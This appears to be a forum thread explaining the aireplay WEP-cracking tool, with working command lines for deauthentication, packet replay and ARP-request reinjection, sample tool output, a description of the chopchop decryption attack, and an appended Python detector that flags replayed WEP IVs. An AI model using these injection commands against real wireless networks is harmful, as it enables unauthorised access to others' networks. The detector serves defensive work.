Quote from MasterDennis
Could someone explain the aireplay command and show a few examples of what its functions do? That would be nice...


Regards, Dennis
http://repat.re.ohost.de/aircrack.html


e.g.:

Generating ARP requests with a Prism2 card

airmon.sh start wlan0
airodump wlan0 out 6 (switch to another console)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0


English helps :D

#

This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:

aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose size is either 68 or 86 bytes (depending on the operating system):

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

# Attack 3: ARP-request reinjection

The classic ARP-request replay attack is the most effective way to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B) or a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

Please note that you can also reuse ARP requests from a previous capture using the -r switch.

aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

# Attack 4: KoreK's "chopchop" (CRC prediction)

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. This attack requires at least one WEP data packet.
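From the defender's side, the ARP-request reinjection described under attack 3 has a simple wireless-IDS signature: the injector re-sends one captured frame thousands of times, so the same transmitter MAC, WEP IV and payload length keep reappearing, whereas a real station never reuses an IV. The following detector is an added example, not part of the post or of aircrack; it builds constructed 802.11 WEP frames (using the MACs from the post) instead of reading a real capture, and the 68-byte ARP frame layout it assumes is the one the post mentions.

```python
from collections import Counter

# Constructed sample addresses (the ones the post uses), not taken from a capture.
BSSID = bytes.fromhex("00131030249C")
CLIENT = bytes.fromhex("00095BEBC52B")    # legitimately associated station
INJECTOR = bytes.fromhex("001122334455")  # spoofed MAC used for reinjection

def build_wep_frame(transmitter, bssid, dst, iv, body):
    """Build a minimal 802.11 WEP data frame (ToDS=1, Protected=1).
    Layout: FC(2) dur(2) addr1=BSSID addr2=SA addr3=DA seq(2) IV(3) keyidx(1) body."""
    fc = bytes([0x08, 0x41])
    return fc + b"\x00\x00" + bssid + transmitter + dst + b"\x00\x00" + iv + b"\x00" + body

def parse_wep_frame(frame):
    """Return (transmitter, iv, payload_len) for a protected data frame, else None."""
    if len(frame) < 28:
        return None
    if (frame[0] & 0x0C) != 0x08 or not (frame[1] & 0x40):  # not data / not Protected
        return None
    # addr2 is always the transmitting station; the IV follows the 24-byte MAC header.
    return frame[10:16], frame[24:27], len(frame) - 28

def find_replayed_ivs(frames, threshold=10):
    """Count (transmitter, IV, payload length) triples; a station normally never reuses
    an IV, so any triple seen >= threshold times is a reinjection signature."""
    seen = Counter()
    for f in frames:
        parsed = parse_wep_frame(f)
        if parsed:
            seen[parsed] += 1
    return {k: n for k, n in seen.items() if n >= threshold}

def sample_capture():
    """Constructed traffic: 50 normal frames with fresh IVs, then one 68-byte ARP
    request (24 hdr + 4 IV + 40 encrypted ARP+ICV) replayed 200 times."""
    bcast = b"\xff" * 6
    frames = [build_wep_frame(CLIENT, BSSID, bcast, i.to_bytes(3, "big"), b"\x00" * 40)
              for i in range(50)]
    arp = build_wep_frame(INJECTOR, BSSID, bcast, b"\x12\x34\x56", b"\x00" * 40)
    assert len(arp) == 68
    return frames + [arp] * 200

if __name__ == "__main__":
    for (tx, iv, n), count in find_replayed_ivs(sample_capture()).items():
        print(f"{tx.hex(':')} replayed IV {iv.hex()} ({n}-byte payload) {count} times")
```

On real traffic the same logic runs over frames read from a monitor-mode capture; the legitimate client never trips the threshold because each of its frames carries a new IV.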